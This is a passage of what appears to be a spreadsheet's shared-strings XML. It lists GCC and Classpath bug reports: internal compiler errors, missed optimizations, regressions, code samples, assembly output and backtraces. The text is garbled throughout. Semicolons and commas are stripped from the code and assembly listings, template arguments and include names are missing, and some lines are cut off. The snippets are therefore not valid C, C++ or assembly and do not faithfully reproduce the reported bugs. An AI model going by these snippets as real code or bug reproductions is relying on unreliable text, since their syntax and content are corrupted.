Use the slice_array::operator=(...)</t>
  </si>
  <si>
    <t>gdr</t>
  </si>
  <si>
    <t>jarl</t>
  </si>
  <si>
    <t>GCC-32373</t>
  </si>
  <si>
    <t>not vectorized: can't determine dependence (equivalence)</t>
  </si>
  <si>
    <t>gfortran -O3  -ftree-vectorize -ftree-vectorizer-verbose=2 -c k90.f90
Shows missed vectorization at source lines 125332380 638
These problems appear to be associated with the EQUIVALENCE (source line 92) which names one or more of the arrays involved.</t>
  </si>
  <si>
    <t>tprince</t>
  </si>
  <si>
    <t>GCC-78337</t>
  </si>
  <si>
    <t>internal compiler error: Segmentation fault using local variable in lambda return-type deduction</t>
  </si>
  <si>
    <t>Created attachment 40032
c++ code
The following code generates a internal compiler error: Segmentation fault. Code and gcc trace attached.
If I specify that `f` is `constexpr` then there is not a segmentation fault. This code began as an attempt to identify at compile time if a given expression can be treated as a constant expression but here I have simplified it. (The full code worked in clang in the manner that I expected. See http://stackoverflow.com/a/40413051/146041 for more on the context.)
My hunch is that 'f' is the problem here. It is being used in the computation of the return type of the generic lambda. In this particular codebase I would expect a conventional refusal to compile with an error message about the fact that a constant expression is necessary as the non-type int parameter to the template Void.
//  g++ (GCC) 6.2.0
struct X {
    static constexpr int foo (int b) {
        return b
    }
}
template
using Void = void
template
auto
bar(F f A a) -&gt; decltype( ( f(a)  0 ) )
{ return {} }
int main() {
    //constexpr
        int f = 3
    (void)f
    auto l = [](auto of_type_X)-&gt;
           Void{return}
    bar( l  X{})
}</t>
  </si>
  <si>
    <t>aaron.mcdaid</t>
  </si>
  <si>
    <t>GCC-16532</t>
  </si>
  <si>
    <t>Inefficient jump to epilogue</t>
  </si>
  <si>
    <t>On sparc-sun-solaris2.7 using 
gcc-3.4.0 -O2 -mcpu=ultrasparc -m32
This function:
extern unsigned char first_one[65536]
int FirstOne(unsigned long long arg1)
{
  if (arg1 &gt;&gt; 48)
    return (first_one[arg1 &gt;&gt; 48])
  if ((arg1 &gt;&gt; 32) &amp; 65535)
    return (first_one[(arg1 &gt;&gt; 32) 
  if ((arg1 &gt;&gt; 16) &amp; 65535)
    return (first_one[(arg1 &gt;&gt; 16) 
  return (first_one[arg1 
}
is compiled to: 
FirstOne:
        !#PROLOGUE# 0
        save    %sp -112 %sp
        !#PROLOGUE# 1
        sethi   %hi(64512) %o3
        mov     0 %o2
        sllx    %i0 32 %g1
        srl     %i1 0 %i1
        or      %i1 %g1 %g1
        srlx    %g1 32 %g1
        srlx    %g1 32 %i4
        mov     %g1 %i5
        or      %o3 1023 %o3
        and     %i4 %o2 %o4
        sllx    %i0 32 %g1
        srl     %i1 0 %i1
        or      %i1 %g1 %g1
        srlx    %g1 48 %g1
        srlx    %g1 32 %i2
        mov     %g1 %i3
        orcc    %i2 %i3 %g0
        bept   %icc .LL2
        and     %i5 %o3 %o5
        sethi   %hi(first_one) %g1
        or      %g1 %lo(first_one) %g1
        bapt   %xcc .LL1
        ldub    [%g1+%i3] %i0
.LL2:
        sethi   %hi(64512) %g1
        orcc    %o4 %o5 %g0
        or      %g1 1023 %g1
        bept   %icc .LL3
        and     %i5 %g1 %i5
        sethi   %hi(first_one) %g1
        or      %g1 %lo(first_one) %g1
        ldub    [%g1+%i5] %i5
        bapt   %xcc .LL1
        add     %i5 16 %i0
.LL3:
        sethi   %hi(64512) %g1
        or      %g1 1023 %g1
        and     %i1 %g1 %i2
        sllx    %i0 32 %g1
        srl     %i1 0 %i1
        or      %i1 %g1 %g1
        srlx    %g1 16 %g1
        srlx    %g1 32 %i4
        mov     %g1 %i5
        sethi   %hi(64512) %g1
        and     %i4 %o2 %i4
        or      %g1 1023 %g1
        and     %i5 %g1 %i3
        and     %i5 %o3 %i5
        orcc    %i4 %i5 %g0
        bept   %icc .LL4
        sethi   %hi(first_one) %g1
        or      %g1 %lo(first_one) %g1
        ldub    [%g1+%i3] %i5
        bapt   %xcc .LL1
        add     %i5 32 %i0
.LL4:
        or      %g1 %lo(first_one) %g1
        ldub    [%g1+%i2] %i5
        add     %i5 48 %i0
.LL1:
        return  %i7+8
        nop
It is probably better to just duplicate the epilogue instead of using 
bapt   %xcc .LL1 this is what Forte-7 does (and gcc on x86). 
I don't have mainline gcc built on sparc to see if this is still the case.
The function is from crafty a different version of this function appears in
186.crafty from SPEC2000 the same problem can be seen in that code. (The code
in SPEC2K which is functionally equivalent is optimized much better than the
function above).</t>
  </si>
  <si>
    <t>ebotcazou</t>
  </si>
  <si>
    <t>dann</t>
  </si>
  <si>
    <t>GCC-60574</t>
  </si>
  <si>
    <t>[4.9 Regression] [c++1y] ICE with deduced return type in virtual function and LTO</t>
  </si>
  <si>
    <t>The following questionable code snippet (compiled with
-std=c++1y -flto -fpermissive) triggers an ICE on trunk:
========================
struct A
{
  virtual auto foo() {}
}
struct B : A
{
  auto foo()
}
B b
========================
bug.cc:3:20: warning: virtual function cannot have deduced return type [-fpermissive]
   virtual auto foo() {}
                    ^
bug.cc:11:4: internal compiler error: tree code 'template_type_parm' is not supported in LTO streams
 B b
    ^
0xabb20e DFS_write_tree
        ../../gcc/gcc/lto-streamer-out.c:1300
0xaba575 DFS_write_tree_body
        ../../gcc/gcc/lto-streamer-out.c:476
0xaba575 DFS_write_tree
        ../../gcc/gcc/lto-streamer-out.c:1208
0xaba575 DFS_write_tree_body
        ../../gcc/gcc/lto-streamer-out.c:476
0xaba575 DFS_write_tree
        ../../gcc/gcc/lto-streamer-out.c:1208
0xabc8d7 lto_output_tree(output_block* tree_node* bool bool)
        ../../gcc/gcc/lto-streamer-out.c:1390
0xab6c7f write_global_stream
        ../../gcc/gcc/lto-streamer-out.c:2100
0xabeb1e lto_output_decl_state_streams
        ../../gcc/gcc/lto-streamer-out.c:2144
0xabeb1e produce_asm_for_decls()
        ../../gcc/gcc/lto-streamer-out.c:2429
0xb00eff write_lto
        ../../gcc/gcc/passes.c:2297
0xb03f48 ipa_write_summaries_1
        ../../gcc/gcc/passes.c:2356
0xb03f48 ipa_write_summaries()
        ../../gcc/gcc/passes.c:2413
0x894044 ipa_passes
        ../../gcc/gcc/cgraphunit.c:2078
0x894044 compile()
        ../../gcc/gcc/cgraphunit.c:2174
0x8942f4 finalize_compilation_unit()
        ../../gcc/gcc/cgraphunit.c:2329
0x68d46e cp_write_global_declarations()
        ../../gcc/gcc/cp/decl2.c:4610
Please submit a full bug report [etc.]
In GCC 4.8.x the code was rejected.</t>
  </si>
  <si>
    <t>GCC-8340</t>
  </si>
  <si>
    <t>ICE on x86 inline asm w/ -fPIC</t>
  </si>
  <si>
    <t xml:space="preserve">From: Glen Nakamura 
To: gcc-gnats@gcc.gnu.org gcc-bugs@gcc.gnu.org
Cc:  
Subject: Re: target/8340: [mainline regression] ICE on x86 inline asm w/ -fPIC
Date: Thu 24 Oct 2002 07:40:38 -1000
 http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit-trail&amp;database=gcc&amp;pr=8340
 On second thought maybe this really is invalid code when compiled w/ -fPIC?
 gcc-3.2.1 silently generates the following incorrect code:
 00000000 :
    0:	55                   	push   %ebp
    1:	89 e5                	mov    %esp%ebp
    3:	53                   	push   %ebx
    4:	e8 00 00 00 00       	call   9 
    9:	5b                   	pop    %ebx
    a:	81 c3 03 00 00 00    	add    $0x3%ebx
   10:	31 db                	xor    %ebx%ebx
   12:	89 9b 00 00 00 00    	mov    %ebx0x0(%ebx)
   18:	8b 83 00 00 00 00    	mov    0x0(%ebx)%eax
   1e:	5b                   	pop    %ebx
   1f:	5d                   	pop    %ebp
   20:	c3                   	ret    
 A better error message would be nice especially for gcc-3.2.1
 but this isn't a high priority since the code seems invalid to me.
 - glen
</t>
  </si>
  <si>
    <t>CLASSPATH-22913</t>
  </si>
  <si>
    <t>java.lang.Object contains native method</t>
  </si>
  <si>
    <t xml:space="preserve">The following method in java.lang.Object should be moved to VMObject.
  public final native Class getClass()
</t>
  </si>
  <si>
    <t>from-classpath</t>
  </si>
  <si>
    <t>GCC-48389</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in make_edges at cfgbuild.c:319 with -mtune=pentiumpro</t>
  </si>
  <si>
    <t>Created attachment 23838
reduced testcase
Compiler output:
$ gcc -O -m32 -mtune=pentiumpro testcase.c -Wno-abi
testcase.c: In function 'foo':
testcase.c:9:1: internal compiler error: in make_edges at cfgbuild.c:319
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  fancy_abort (file=0x1348888 /mnt/svn/gcc-trunk/gcc/cfgbuild.c line=319 function=0x1348a01 make_edges)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:892
#1  0x0000000000f57610 in make_edges (blocks=Unhandled dwarf expression opcode 0xf3
) at /mnt/svn/gcc-trunk/gcc/cfgbuild.c:319
#2  find_many_sub_basic_blocks (blocks=Unhandled dwarf expression opcode 0xf3
) at /mnt/svn/gcc-trunk/gcc/cfgbuild.c:595
#3  0x00000000005e3f78 in gimple_expand_cfg () at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:4199
#4  0x00000000007f0486 in execute_one_pass (pass=0x1648ac0) at /mnt/svn/gcc-trunk/gcc/passes.c:1555
#5  0x00000000007f0775 in execute_pass_list (pass=0x1648ac0) at /mnt/svn/gcc-trunk/gcc/passes.c:1610
#6  0x00000000009353d5 in tree_rest_of_compilation (fndecl=0x7ffff5978100) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:422
#7  0x0000000000b010c7 in cgraph_expand_function (node=0x7ffff5992000) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1575
#8  0x0000000000b0381c in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1634
#9  cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1898
#10 0x0000000000b03d9a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1095
#11 0x0000000000508de4 in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:9879
#12 0x00000000008de0fd in compile_file (argc=17 argv=0x7fffffffdc88) at /mnt/svn/gcc-trunk/gcc/toplev.c:591
#13 do_compile (argc=17 argv=0x7fffffffdc88) at /mnt/svn/gcc-trunk/gcc/toplev.c:1900
#14 toplev_main (argc=17 argv=0x7fffffffdc88) at /mnt/svn/gcc-trunk/gcc/toplev.c:1963
#15 0x00007ffff6487b6d in __libc_start_main () from /lib/libc.so.6
#16 0x00000000004ef7f9 in _start ()
Tested revisions:
r171775 - crash
4.6 r171597 - crash
4.5 r171597 - crash
4.4 r171597 - OK</t>
  </si>
  <si>
    <t>law</t>
  </si>
  <si>
    <t>zsojka</t>
  </si>
  <si>
    <t>GCC-53108</t>
  </si>
  <si>
    <t>Nested template classes and variadic templates</t>
  </si>
  <si>
    <t>//Begin Code----------------------------------------------------
#include 
namespace my_types
{
struct nil {}
template 
struct chain
{
	typedef T first_type
	typedef U second_type
}
}
template  class Chain typename Nil&gt;
struct chain_generator
{
	template 
	struct gen
	{
	private:
		template 
		struct inner
		{
			typedef Chain::type &gt; type
		}
		template 
		struct inner
		{
			typedef Chain type
		}
	public:
		typedef typename inner::type type
	}
}
int main( /* int argc char* argv[] */ )
{
	using my_types::chain
	using my_types::nil
	typedef chain&gt;&gt; t0
	typedef chain_generator my_gen
	typedef my_gen::gen::type t1
	return 0
}
//End Code ----------------------------------------------------
See the attached file:
Compiler error:
test.cpp: In instantiation of 'struct chain_generator::gen::inner':
test.cpp:44:49:   required from 'struct chain_generator::gen'
test.cpp:58:39:   required from here
test.cpp:35:51: error: type/value mismatch at argument 1 in template parameter list for 'template class Chain class Nil&gt; template struct chain_generator::gen'
test.cpp:35:51: error:   expected a type got '#'tree_vec' not supported by dump_expr#'
test.cpp:35:51: error: type/value mismatch at argument 2 in template parameter list for 'template class Chain class Nil&gt; template struct chain_generator::gen'
test.cpp:35:51: error:   expected a type got '#'tree_vec' not supported by dump_expr#'</t>
  </si>
  <si>
    <t>fpelliccioni</t>
  </si>
  <si>
    <t>GCC-4075</t>
  </si>
  <si>
    <t>preprocessor</t>
  </si>
  <si>
    <t>Specifying a different version does not work</t>
  </si>
  <si>
    <t xml:space="preserve">	Invoking gcc with the -V option results in an error message
	file.c:(n): undefined or invalid # directive where (n) is
	the line number of some include directive.
Release:
3.0.1
Environment:
System: Linux monocerus.demon.co.uk 2.2.19 #1 Mon Mar 26 21:18:17 BST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.1/configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --enable-threads --enable-languages=cc++ --disable-nls
How-To-Repeat:
        echo '#include ' &gt; foo.c
	gcc -V2.95.3 foo.c
	... or worse ...
	gcc -V2.7.2.3 foo.c</t>
  </si>
  <si>
    <t>juergen</t>
  </si>
  <si>
    <t>GCC-25634</t>
  </si>
  <si>
    <t>[3.4 regression] Multiple template parameter lists accepted</t>
  </si>
  <si>
    <t>The following invalid code snippet is accepted since GCC 3.4.4:
=============================================
template template struct A
=============================================
Might be related to PR 24314.</t>
  </si>
  <si>
    <t>GCC-45074</t>
  </si>
  <si>
    <t>GCC Segmentation fault - negating global register variables</t>
  </si>
  <si>
    <t>When compiling the following example using language c++ (compiling in language c works fine) and optimization level -O1 or higher (-O0 works fine) GCC 4.4.1 for MIPS crashes with an internal compiler error - segmentation fault in line 5.
Please note that the register variable is declared double when using float type the error does not occur.
gcc -O1 -x c++ test_neg_float_register.c
---------test_neg_float_register.c----------
register double g_param_f64_1 __asm__($f20)
void negate_float_register (void)
{
  g_param_f64_1 = -(g_param_f64_1)
}
--------------------------------------------
See attachment for example file.
The error is reproducible with GCC version 4.3.2 and 4.4.1 and optimization level higher -O0 (that is -O1 -O2 -O3).</t>
  </si>
  <si>
    <t>steffen-schmidt</t>
  </si>
  <si>
    <t>GCC-68057</t>
  </si>
  <si>
    <t>ipa</t>
  </si>
  <si>
    <t>[6 Regression] 450.soplex in SPEC CPU 2006 failed to build</t>
  </si>
  <si>
    <t>For x32 r229159 gave
g++ -mx32  -O2 -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin          changesoplex.o didxset.o dsvector.o dvector.o enter.o example.o factor.o forest.o idxset.o leave.o lpcolset.o lprow.o lprowset.o message.o mpsinput.o nameset.o slufactor.o solve.o soplex.o spxaggregatesm.o spxbasis.o spxbounds.o spxchangebasis.o spxdefaultpr.o spxdefaultrt.o spxdefines.o spxdesc.o spxdevexpr.o spxequilisc.o spxfastrt.o spxgeneralsm.o spxharrisrt.o spxhybridpr.o spxid.o spxio.o spxlp.o spxlpfread.o spxmpsread.o spxmpswrite.o spxparmultpr.o spxquality.o spxredundantsm.o spxrem1sm.o spxscaler.o spxshift.o spxsolve.o spxsolver.o spxstarter.o spxsteeppr.o spxsumst.o spxvecs.o spxvectorst.o spxweightpr.o spxweightst.o ssvector.o svector.o svset.o timer.o unitvector.o update.o updatevector.o vector.o vsolve.o                     -o soplex
lto1: internal compiler error: in record_target_from_binfo at ipa-devirt.c:2599
0x806e06 record_target_from_binfo
	../../src-trunk/gcc/ipa-devirt.c:2599
0x806910 record_target_from_binfo
	../../src-trunk/gcc/ipa-devirt.c:2640
0x807344 possible_polymorphic_call_targets_1
	../../src-trunk/gcc/ipa-devirt.c:2687
0x80e6c9 possible_polymorphic_call_targets(tree_node* long ipa_polymorphic_call_context bool* void** bool)
	../../src-trunk/gcc/ipa-devirt.c:3216
0x80ffbc try_speculative_devirtualization(tree_node* long ipa_polymorphic_call_context)
	../../src-trunk/gcc/ipa-devirt.c:3576
0x10a887f ipa_get_indirect_edge_target_1
	../../src-trunk/gcc/ipa-cp.c:2142
0x8220d2 estimate_edge_devirt_benefit
	../../src-trunk/gcc/ipa-inline-analysis.c:3048
0x8224db estimate_edge_size_and_time
	../../src-trunk/gcc/ipa-inline-analysis.c:3088
0x8224db estimate_calls_size_and_time
	../../src-trunk/gcc/ipa-inline-analysis.c:3164
0x822826 estimate_node_size_and_time
	../../src-trunk/gcc/ipa-inline-analysis.c:3259
0x824d8d do_estimate_edge_time(cgraph_edge*)
	../../src-trunk/gcc/ipa-inline-analysis.c:3745
0x825317 do_estimate_edge_size(cgraph_edge*)
	../../src-trunk/gcc/ipa-inline-analysis.c:3796
0x825587 estimate_edge_size
	../../src-trunk/gcc/ipa-inline.h:293
0x825587 estimate_edge_growth
	../../src-trunk/gcc/ipa-inline.h:306
0x825587 estimate_size_after_inlining(cgraph_node* cgraph_edge*)
	../../src-trunk/gcc/ipa-inline-analysis.c:3889
0x10b8c64 caller_growth_limits
	../../src-trunk/gcc/ipa-inline.c:193
0x10b8c64 can_inline_edge_p
	../../src-trunk/gcc/ipa-inline.c:398
0x10bdaad update_callee_keys
	../../src-trunk/gcc/ipa-inline.c:1404
0x10c00eb inline_small_functions
	../../src-trunk/gcc/ipa-inline.c:2041
0x10c00eb ipa_inline
	../../src-trunk/gcc/ipa-inline.c:2425
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: g++ returned 1 exit status
compilation terminated.
/usr/local/bin/ld: error: lto-wrapper failed
collect2: error: ld returned 1 exit status
specmake[3]: *** [soplex] Error 1
r229021 is OK.</t>
  </si>
  <si>
    <t>GCC-28040</t>
  </si>
  <si>
    <t>[m68k]wrong move const extends output at coldfire v4</t>
  </si>
  <si>
    <t>Hi
I think gcc-4.1.1 generates wrong outputs on coldfire v4 at this code.
-----------------------------
struct ab {
  int a
  unsigned int b
}
int
main () {
  struct ab _ab
  short a = 0
  unsigned short b = 0
  _ab.a = -999
  _ab.b = 1000
  a = _ab.a
  b = _ab.b
  printf(%d\n a )
  printf(%d\n b )
  return 0
}
---------------------
./xgcc  -m5407 -S ./test.c
---------------------
        ...
        link.w %fp#-8
        mvzw #-999%d0       &lt;- zero extends(_ab.a)
        move.l %d0-8(%fp)
        mvsw #1000%d0       &lt;- sign extends(_ab.b)
        move.l %d0-4(%fp)
        move.l -8(%fp)%d0
        move.l %d0-(%sp)
        ....
--------------------------------
and This is a patch.
gcc/config/m68k/m68k.c: output_move_const_into_data_reg.
--- m68k.bak    2006-06-15 19:49:00.000000000 +0900
+++ m68k.c      2006-06-15 19:49:42.000000000 +0900
@@ -16589 +16589 @@
   switch (const_method (operands[1]))
     {
     case MVZ:
-      return mvsw %1%0
-    case MVS:
       return mvzw %1%0
+    case MVS:
+      return mvsw %1%0
     case MOVQ :
       return moveq %1%0
     case NOTB :</t>
  </si>
  <si>
    <t>takahisa.yokota</t>
  </si>
  <si>
    <t>GCC-35834</t>
  </si>
  <si>
    <t>building libiberty fails in build2_stat for -mcpu=m32c as of r133403</t>
  </si>
  <si>
    <t>$ ./cc1 -fpreprocessed /tmp/cplus-dem.i -quiet -dumpbase cplus-dem.c -mcpu=m32cm -auxbase-strip cplus-dem.o -g -O2 -W -Wall -Wwrite-strings -Wc++-compat -Wstrict-prototypes -pedantic -o cplus-dem.s
../../../../gcc/libiberty/cplus-dem.c: In function 'cplus_demangle_name_to_style':
../../../../gcc/libiberty/cplus-dem.c:807: internal compiler error: in build2_stat at tree.c:3107</t>
  </si>
  <si>
    <t>dj</t>
  </si>
  <si>
    <t>GCC-58567</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE with invalid loop variable in template using openmp</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -fopenmp) triggers an ICE since GCC 4.8.0:
================================================
template void foo()
{
  #pragma omp parallel for
  for (typename T::X i = 0 i &lt; 100 ++i)
}
void bar()
{
  foo()
}
================================================
bug.cc: In instantiation of 'void foo() [with T = int]':
bug.cc:10:12:   required from here
bug.cc:4:22: error: 'int' is not a class struct or union type
   for (typename T::X i = 0 i &lt; 100 ++i)
                      ^
bug.cc:4:3: internal compiler error: tree check: expected tree that contains 'decl common' structure have 'error_mark' in tsubst_omp_for_iterator at cp/pt.c:12938
   for (typename T::X i = 0 i &lt; 100 ++i)
   ^
0xcdaef7 tree_contains_struct_check_failed(tree_node const* tree_node_structure_enum char const* int char const*)
        ../../gcc/gcc/tree.c:9348
0x5aa6b1 contains_struct_check
        ../../gcc/gcc/tree.h:2723
0x5aa6b1 tsubst_omp_for_iterator
        ../../gcc/gcc/cp/pt.c:12938
0x5a55ee tsubst_expr
        ../../gcc/gcc/cp/pt.c:13481
0x5a43d8 tsubst_expr
        ../../gcc/gcc/cp/pt.c:13446
0x5a4451 tsubst_expr
        ../../gcc/gcc/cp/pt.c:13284
0x5a1dcf instantiate_decl(tree_node* int bool)
        ../../gcc/gcc/cp/pt.c:19391
0x5de71f instantiate_pending_templates(int)
        ../../gcc/gcc/cp/pt.c:19492
0x6198c7 cp_write_global_declarations()
        ../../gcc/gcc/cp/decl2.c:4060
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-57490</t>
  </si>
  <si>
    <t>c</t>
  </si>
  <si>
    <t>ICE on c-c++-common/cilk-plus/AN/an-if.c</t>
  </si>
  <si>
    <t>The test triggers an ICE with any options:
(botcazou@ob) /nile.build/botcazou/gcc-head/sparc-sun-solaris2.10 $ gcc/xgcc -Bgcc -S an-if.c -fcilkplus
In file included from an-if.c:7:0:
an-if.c: In function 'main':
an-if.c:28:33: internal compiler error: in gimplify_expr at gimplify.c:7809
         assert( __sec_reduce_add(x[0:n])==3*n )
                                 ^
0x37c04b gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        /nile.build/botcazou/gcc-head/src/gcc/gimplify.c:7809
0x382fdb gimplify_call_expr
        /nile.build/botcazou/gcc-head/src/gcc/gimplify.c:2629
0x379417 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        /nile.build/botcazou/gcc-head/src/gcc/gimplify.c:7131
0x37bdc7 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        /nile.build/botcazou/gcc-head/src/gcc/gimplify.c:7771
0x379967 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        /nile.build/botcazou/gcc-head/src/gcc/gimplify.c:7780
0x381a23 gimplify_cond_expr
        /nile.build/botcazou/gcc-head/src/gcc/gimplify.c:3245
0x3792df gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        /nile.build/botcazou/gcc-head/src/gcc/gimplify.c:7116
[...]</t>
  </si>
  <si>
    <t>GCC-40488</t>
  </si>
  <si>
    <t>testsuite</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 148642 caused extra failures</t>
  </si>
  <si>
    <t>Revision 148642:
http://gcc.gnu.org/ml/gcc-cvs/2009-06/msg00625.html
caused:
FAIL: gfortran.dg/bind_c_usage_13.f03  -O  scan-tree-dump original mult .
FAIL: gfortran.dg/bind_c_usage_13.f03  -O  scan-tree-dump original mult_array .
FAIL: gfortran.dg/bind_c_usage_13.f03  -O  scan-tree-dump original mult_val ..x. .x. 1 1.
FAIL: gfortran.dg/bind_c_usage_13.f03  -O  scan-tree-dump original sub .
FAIL: gfortran.dg/bind_c_usage_13.f03  -O  scan-tree-dump original sub_array .
FAIL: gfortran.dg/bind_c_usage_13.f03  -O  scan-tree-dump original sub_val ..x. 1.
FAIL: gfortran.dg/bind_c_usage_14.f03  -O  scan-tree-dump original master.0.sub3noiso .0 0B 0B 0B b a 0 0 1 1\)
FAIL: gfortran.dg/bind_c_usage_14.f03  -O  scan-tree-dump original master.0.sub3noiso .1 z y x 0B 0B 1 1 0 0\)
FAIL: gfortran.dg/bind_c_usage_14.f03  -O  scan-tree-dump original master.1.sub4iso .0 0B 0B 0B b a 0 0 1 1\)
FAIL: gfortran.dg/bind_c_usage_14.f03  -O  scan-tree-dump original master.1.sub4iso .1 z y x 0B 0B 1 1 0 0\)
FAIL: gfortran.dg/bind_c_usage_14.f03  -O  scan-tree-dump original master.2.sub5iso .0 0B 0B 0B b a 0 0 1 1\)
FAIL: gfortran.dg/bind_c_usage_14.f03  -O  scan-tree-dump original master.2.sub5iso .1 z y x 0B 0B 1 1 0 0\)
FAIL: gfortran.dg/bind_c_usage_14.f03  -O  scan-tree-dump original master.3.sub6noiso .0 0B 0B 0B b a 0 0 1 1\)
FAIL: gfortran.dg/bind_c_usage_14.f03  -O  scan-tree-dump original master.3.sub6noiso .1 z y x 0B 0B 1 1 0 0\)
FAIL: gfortran.dg/c_f_pointer_tests_3.f90  -O  scan-tree-dump-times original c_f 1
FAIL: gfortran.dg/c_f_pointer_tests_3.f90  -O  scan-tree-dump-times original c_f_pointer 1
FAIL: gfortran.dg/c_f_pointer_tests_3.f90  -O  scan-tree-dump-times original c_f_pointer_i4 1
FAIL: gfortran.dg/missing_optional_dummy_4.f90  -O  scan-tree-dump original  tm_doit \(0B 0\)
FAIL: gfortran.dg/missing_optional_dummy_5.f90  -O  scan-tree-dump original  tm_doit \(</t>
  </si>
  <si>
    <t>GCC-22594</t>
  </si>
  <si>
    <t>HOST_LONG_LONG_FORMAT not used in HOST_WIDE_INT_PRINT macro</t>
  </si>
  <si>
    <t>For mips target hosted on mingw32 building libgcc2 fails.
ccAFaaaa.s: Assembler messages:
ccAFaaaa.s:19: Warning: expected `$'
ccAFaaaa.s:19: Error: junk at end of line first unrecognized character is `n'
make[2]: *** [libgcc/./_muldi3.o] Error 1 
the offending code is the function prologue produced by
mips_output_function_prologue in gcc/config/mips/mips.c
__muldi3:
   .frame    $sp0(null)        # vars= 7640055 regs= 0/0 args= 0 gp= 0
which should have been
__muldi3:
   .frame    $sp0$31        # vars= 0 regs= 0/0 args= 0 gp= 0
this is caused by the HOST_WIDE_INT_PRINT_DEC macro in gcc/hwint.h not using the
HOST_LONG_LONG_FORMAT override from /gcc/config/i386/xm-mingw32.h</t>
  </si>
  <si>
    <t>wintermute2k4</t>
  </si>
  <si>
    <t>GCC-28669</t>
  </si>
  <si>
    <t>%s substituted with static/non- can't be properly translated</t>
  </si>
  <si>
    <t>In cp/decl.c there is this code.
      error (%smember function %qD cannot have cv-qualifier
	     (ctype ? static  : non-) decl)
The first string %smember ... is available for translation in the po-file but not the parts substituted static and non-.  And even if they were it surely will not work in all languages to compose a sentence like this.  Two complete strings should be there instead.</t>
  </si>
  <si>
    <t>GCC-36710</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/torture/fp-int-convert-float128.c  -Os  (internal compiler error)</t>
  </si>
  <si>
    <t>On i686-apple-darwin9 at revision 137407 gcc.dg/torture/fp-int-convert-float128.c -m32 -Os fails with:
[ibook-dhum] f90/bug% gcc44 -m32 -Os /opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/torture/fp-int-convert-float128.c
/opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/torture/fp-int-convert-float128.c: In function 'main':
/opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/torture/fp-int-convert-float128.c:19: error: unrecognizable insn:
(insn 25 24 26 3 /opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/torture/fp-int-convert-float128.c:13 (set (mem:TF (pre_dec:SI (reg/f:SI 7 sp)) [0 S16 A8])
        (reg:TF 1735 [ fv2.2 ])) -1 (nil))
/opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/torture/fp-int-convert-float128.c:19: internal compiler error: in extract_insn at recog.c:1989</t>
  </si>
  <si>
    <t>dominiq</t>
  </si>
  <si>
    <t>GCC-43983</t>
  </si>
  <si>
    <t>debug</t>
  </si>
  <si>
    <t>var-tracking needlessly throws away location info for SRAed vars</t>
  </si>
  <si>
    <t>track_expr_p has:
4496  /* If this expression is really a debug alias of some other declaration we
4497     don't need to track this expression if the ultimate declaration is
4498     ignored.  */
4499  realdecl = expr
4500  if (DECL_DEBUG_EXPR_IS_FROM (realdecl) &amp;&amp; DECL_DEBUG_EXPR (realdecl))
4501    {
4502      realdecl = DECL_DEBUG_EXPR (realdecl)
4503      /* ??? We don't yet know how to emit DW_OP_piece for variable
4504         that has been SRA'ed.  */
4505      if (!DECL_P (realdecl))
4506        return 0
4507    }
I'd say if the DECL_DEBUG_EXPR is a COMPONENT_REF ARRAY_REF etc. from a reasonably short type the easiest thing would be just to let var-tracking track the individual vars and let dwarf2out_var_location assemble them together.</t>
  </si>
  <si>
    <t>GCC-83493</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/graphite/pr70045.c (internal compiler error)</t>
  </si>
  <si>
    <t>https://gcc.gnu.org/ml/gcc-testresults/2017-12/msg01271.html:
...
FAIL: gcc.dg/graphite/pr70045.c (internal compiler error)
FAIL: gcc.dg/graphite/pr70045.c (test for excess errors)
...</t>
  </si>
  <si>
    <t>vries</t>
  </si>
  <si>
    <t>GCC-42290</t>
  </si>
  <si>
    <t>strange 'warning: ISRA.2 may be used uninitialized in this function'</t>
  </si>
  <si>
    <t>Command line:
g++ -std=c++0x -O2 -Wall -o tmp.o testcase-manual.ii -c
or
g++ -std=c++0x -O2 -Wall -o tmp.o testcase-manual.ii -c
Gives:
testcase-manual.ii: In function A::~A(A** char*):
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
Tested versions:
r154953 - warns
